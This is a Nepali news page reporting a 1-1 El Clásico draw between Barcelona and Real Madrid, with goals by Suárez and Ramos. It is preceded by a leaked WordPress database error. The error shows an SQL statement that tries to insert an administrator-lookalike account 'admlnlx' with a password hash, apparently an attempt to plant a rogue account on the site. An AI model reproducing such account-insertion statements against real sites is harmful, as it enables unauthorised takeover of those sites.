WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BeGdyry46gYmvHgNq1HTj8Li6101Xi0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 06:01:17', '', 'admlnlx', 'admlnlx')
मंसिर १९–
यो सिजनको पहिलो एल क्लासिकोमा बार्सिलोना र रियल मड्रिडले बराबरी खेल्दै अंक बाँडेका छन् । शनिबार भएको खेलमा बार्सिलोना अन्तिम मिनेटमा चुक्यो र चिरप्रतिद्वन्द्वी रियल मड्रिडसँग १-१ गोलको बराबरी खेल्न पुग्यो । यससँगै रियलले अपराजित यात्रा कायमै राखेको छ ।
बार्सिलोनाको घरेलु मैदान नाउक्याम्पमा भएको पहिलो हाफमा रियल मड्रिड हावी भएपनि गोल गर्न सकेन ।
दोस्रो हाफमा बार्सिलोलाले सुधारिएको प्रदर्शन गर्यो । र, ५३ औं मिनेटमा लुइस स्वरेजले गोल गर्दै घरेलु टोलीलाई अग्रता दिलाए । बार्सिलोनाले अरु केही अबसर पनि गुमायो, जसमा लिओनल मेस्सीको पनि एक छ ।
निर्धारित ९० मिनेटको खेलको अन्तिम मिनेटमा सर्जिओ रामोसले हेड गोल गर्दै खेललाई बराबरीमा पुर्याए । त्यसअघि रोनाल्डोले राम्रो अवसर गुमाएका थिए ।
यो बराबरीसँग रियल मड्रिडको ६ अंकको अग्रता कायमै छ ।